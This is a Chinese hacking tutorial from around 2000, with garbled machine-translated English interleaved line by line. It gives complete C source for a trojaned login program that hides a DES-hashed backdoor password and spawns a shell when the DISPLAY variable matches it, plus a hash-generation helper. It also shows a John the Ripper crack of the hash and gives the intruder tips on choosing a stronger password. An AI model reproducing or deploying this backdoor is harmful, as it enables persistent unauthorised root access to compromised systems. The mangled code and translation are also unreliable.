加密login后门中的密码 Encrypted password in the login backdoor

Sinbad Sinbad



进入主机后，经常发现系统的login程序被先来者给替换了。 After entering the host, often found in the system login program is first come to replace. 国内的机器基本上用strings命令就能看到密码部分，而老外经常做些手脚，最常见的是DES加密。 Basically, the domestic machine with the password can see some of the strings command, and foreigners often do something, the most common is the DES encryption. 本文简单的介绍一下crypt()函数及其在做login后门中的一个示例。 This brief introduction to the crypt () function and do the login in the back door of an example.

先看下面一段程序： A look at the following procedure:

-----------------snip--------------------------------- ----------------- Snip -------------------------------- -
/* / *
generate crypted passwd using DES generate crypted passwd using DES
compile: gcc -o gen gen.c -lcrypt compile: gcc-o gen gen.c-lcrypt
*/ * /

#include # Include

main(int argc, char *argv[]) main (int argc, char * argv [])
{ {
if (argc != 3) if (argc! = 3)
{ {
printf("usage: %s \n", argv[0]); printf ("usage:% s \ n", argv [0]);
exit(1); exit (1);
} }
printf("%s\n", crypt(argv[1], argv[2])); printf ("% s \ n", crypt (argv [1], argv [2]));
} }
-----------------snip--------------------------------- ----------------- Snip -------------------------------- -


这段程序是用来生成shadow密码的。 This procedure is used to generate shadow password. 需要输入两个参数，一个是需要转换的密码password，另一个是salt。 Need to enter two parameters, one need to convert the password password, the other is salt. shadow过的密码前两位也就是salt的前两位。 shadow over the first two is the salt of the password the first two. 该段程序的输出是需要在login.c的define的密码。 The section of the program's output is needed in login.c define password. 比如密码是hack，./gen hack Ui之后得到到UiVqMWvDrIQjA，在login.c中这样定义： Such as a password is hack,. / Gen hack Ui then get to UiVqMWvDrIQjA, in login.c defined like this:

#define PASSWORD "UiVqMWvDrIQjA" # Define PASSWORD "UiVqMWvDrIQjA"

下面是修改过的login.c程序。 The following is modified login.c program.

-----------------snip--------------------------------- ----------------- Snip -------------------------------- -
/* / *
login backdoor login backdoor
compile: gcc -o ulogin login.c -lcrypt compile: gcc-o ulogin login.c-lcrypt
*/ * /

#include # Include

/* / *
PASSWORD的值用上面的gen.c得到 PASSWORD values ​​obtained with the above gen.c
*/ * /
#define PASSWORD "UiVqMWvDrIQjA" # Define PASSWORD "UiVqMWvDrIQjA"
#define SHELL "/bin/csh" # Define SHELL "/ bin / csh"
#define LOGIN_BAK "/sbin/login" # Define LOGIN_BAK "/ sbin / login"

main (argc, argv, envp) main (argc, argv, envp)
int argc; int argc;
char **argv, **envp; char ** argv, ** envp;
{ {

char *display = getenv("DISPLAY"); char * display = getenv ("DISPLAY");

if ( display == NULL ) { if (display == NULL) {
execve(LOGIN_BAK, argv, envp); execve (LOGIN_BAK, argv, envp);
perror(LOGIN_BAK); perror (LOGIN_BAK);
exit(1); exit (1);
} }

if (!strcmp(PASSWORD, crypt(display, PASSWORD))) { if (! strcmp (PASSWORD, crypt (display, PASSWORD))) {
system(SHELL); system (SHELL);
exit(1); exit (1);
} }

execve(LOGIN_BAK, argv, envp); execve (LOGIN_BAK, argv, envp);
exit(1); exit (1);

} }
-----------------snip--------------------------------- ----------------- Snip -------------------------------- -

密码能否用john跑出来呢？ Password can use the john to run out? 假设你这样生成shadow： Suppose you build this shadow:

$ ./gen hack hack $. / Gen hack hack
harGxySYgF3gs harGxySYgF3gs

那么别人就可以把salt的值ha假设为/etc/passwd中的用户名。 So people can put the value of ha is assumed to be salt / etc / passwd the user name.
这样用john来跑密码： John to run with this password:

$ cat>t $ Cat> t
h:harGxySYgF3gs h: harGxySYgF3gs

$ date;./john t;date $ Date;. / John t; date
三10 18 18:07:47 EDT 2000 Three 10 18 18:07:47 EDT 2000
Loaded 1 password (Standard DES [48/64 4K]) Loaded 1 password (Standard DES [48/64 4K])
hack (h) hack (h)
guesses: 1 time: 0:00:01:08 (3) c/s: 45319 trying: h141 - hurf guesses: 1 time: 0:00:01:08 (3) c / s: 45319 trying: h141 - hurf
三10 18 18:08:55 EDT 2000 Three 10 18 18:08:55 EDT 2000
$ $

可见，即使用h做为用户名，一分钟时间密码就跑出来了。 Shows that the use of h as the user name, password and ran one minute out. 所以，首先建议密码要足够强壮，另外用gen.c生成shadow的时候，salt一定不要采用和password一样的值。 Therefore, the first password to be strong enough to recommend, in addition, when using gen.c generate shadow, salt and the password must not use the same value.

也可以把SHELL和LOGIN_BAK进行加密。 SHELL and LOGIN_BAK can also be encrypted. 由于login后门太容易被发现，再折腾也没什么意思了。 As the login is too easy to find the back door, then toss has no meaning.

上文纯属闲扯，有任何错误的提法，还请来信指教。 Above purely cackle, any error reference, a letter also requested advice. :) :)